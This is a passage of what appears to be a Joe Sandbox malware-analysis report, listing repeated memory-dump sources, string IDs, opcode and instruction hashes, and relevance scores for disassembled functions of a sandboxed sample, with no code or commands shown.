                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: bBK$rBK
                                                                                          • API String ID: 0-3079827781
                                                                                          • Opcode ID: f22562a9707c65f859ecb4441d964e03fffcc9106381c7f6703c9c4bac30050b
                                                                                          • Instruction ID: 85f2db900f7d4fde9af9298d3c612d9928d51aa08c450bce6ba2562489ee136f
                                                                                          • Opcode Fuzzy Hash: f22562a9707c65f859ecb4441d964e03fffcc9106381c7f6703c9c4bac30050b
                                                                                          • Instruction Fuzzy Hash: 1651DE32A08351DFC304CF29D8806AAB7E1FBCA304F598A7DE885C7341D3389846DB56
                                                                                          Function 0048D010 Relevance: 2.0, Strings: 1, Instructions: 715COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _a c
                                                                                          • API String ID: 0-3120592319
                                                                                          • Opcode ID: 595347badf9beb74bcadc41689ec60b1bbfaa541ab0a71c469be0461a151d2df
                                                                                          • Instruction ID: 52b0f0eef4060629eaebf4513509ba954a4adb1908cbdd74ee96ee54ea131be8
                                                                                          • Opcode Fuzzy Hash: 595347badf9beb74bcadc41689ec60b1bbfaa541ab0a71c469be0461a151d2df
                                                                                          • Instruction Fuzzy Hash: 5612E3B09017009BD724EF39C982B677BF1FF45314F444A2EE89A8B795E338A405CB96
                                                                                          Function 004A2240 Relevance: 1.9, Strings: 1, Instructions: 691COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: =J
                                                                                          • API String ID: 0-416314540
                                                                                          • Opcode ID: bb0e92c0843b1783b5033524825f6bd25e6f95adc7f9f6f681c84a5cd57cb9a3
                                                                                          • Instruction ID: 5bec0e2492e04b7db8c67c4bfa5ed0e5f5935abb8b2f3a7cd0f0855fc2efa82f
                                                                                          • Opcode Fuzzy Hash: bb0e92c0843b1783b5033524825f6bd25e6f95adc7f9f6f681c84a5cd57cb9a3
                                                                                          • Instruction Fuzzy Hash: 8B6282F0A14B009FC7A1CF2DD892B86BBECAB0D700F00895EA19ED7355D77579108B6A
                                                                                          Function 00475000 Relevance: 1.8, Strings: 1, Instructions: 551COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1.17g
                                                                                          • API String ID: 0-1551345525
                                                                                          • Opcode ID: e6d000957c8845ace6a1f2f115426f01667a003ab327820fd481dcdf959f9299
                                                                                          • Instruction ID: 74c627fd613d1344069e4a079541f879c508a648bf7101e4c25ba142da0442dc
                                                                                          • Opcode Fuzzy Hash: e6d000957c8845ace6a1f2f115426f01667a003ab327820fd481dcdf959f9299
                                                                                          • Instruction Fuzzy Hash: 2912D571A04B418BE7258E2485803ABB7E2AFA0314F1DC56ED89D4F351E7F9DC45C74A
                                                                                          Function 00496940 Relevance: 1.7, Strings: 1, Instructions: 480COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Y!
                                                                                          • API String ID: 0-2222236823
                                                                                          • Opcode ID: de2019cac855f93b4b9dca792f12d0b42a25bcdff417bff8e4e85576c8770e2b
                                                                                          • Instruction ID: 3e81c9e4ce0adaa13f1e39e634f04d56a35a7d35be34bd5429aea5b6e9a25b09
                                                                                          • Opcode Fuzzy Hash: de2019cac855f93b4b9dca792f12d0b42a25bcdff417bff8e4e85576c8770e2b
                                                                                          • Instruction Fuzzy Hash: 5FC12772A042104BDB14DB24CC926ABBBE1EF92354F0A853EE8D997391E738DD05C75A
                                                                                          Function 0049ECE0 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                          • Instruction ID: 0e31175318bd4572b6a7d0b0a15d1387644bfbaf3f415662a0451072d7426f0d
                                                                                          • Opcode Fuzzy Hash: 07a68b65afc1f8c2f0352e68ae02b44972fd835b148217e58b0b56862b6ef539
                                                                                          • Instruction Fuzzy Hash: 53D1F8B2A083019FDB15CE25C48176B7BD9AB84354F19893FE489C7382E738DD4587DA
                                                                                          Function 00491EC5 Relevance: 1.6, Strings: 1, Instructions: 400COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _a1c
                                                                                          • API String ID: 0-3923334831
                                                                                          • Opcode ID: 4d395469c6343be5e678811c7c363fe9351720eaa9a955b4927d32db90a1f6a6
                                                                                          • Instruction ID: 744ce865ec528d266712915db9e6545f2be12ea29dadb89022c4d2e64e4aa509
                                                                                          • Opcode Fuzzy Hash: 4d395469c6343be5e678811c7c363fe9351720eaa9a955b4927d32db90a1f6a6
                                                                                          • Instruction Fuzzy Hash: 1AC10FB55093018BD710CF24C89176BBBF2EFD5754F188A2DE4C45B3A5E7788942CB4A
                                                                                          Function 004B2B10 Relevance: 1.6, Strings: 1, Instructions: 335COMMON
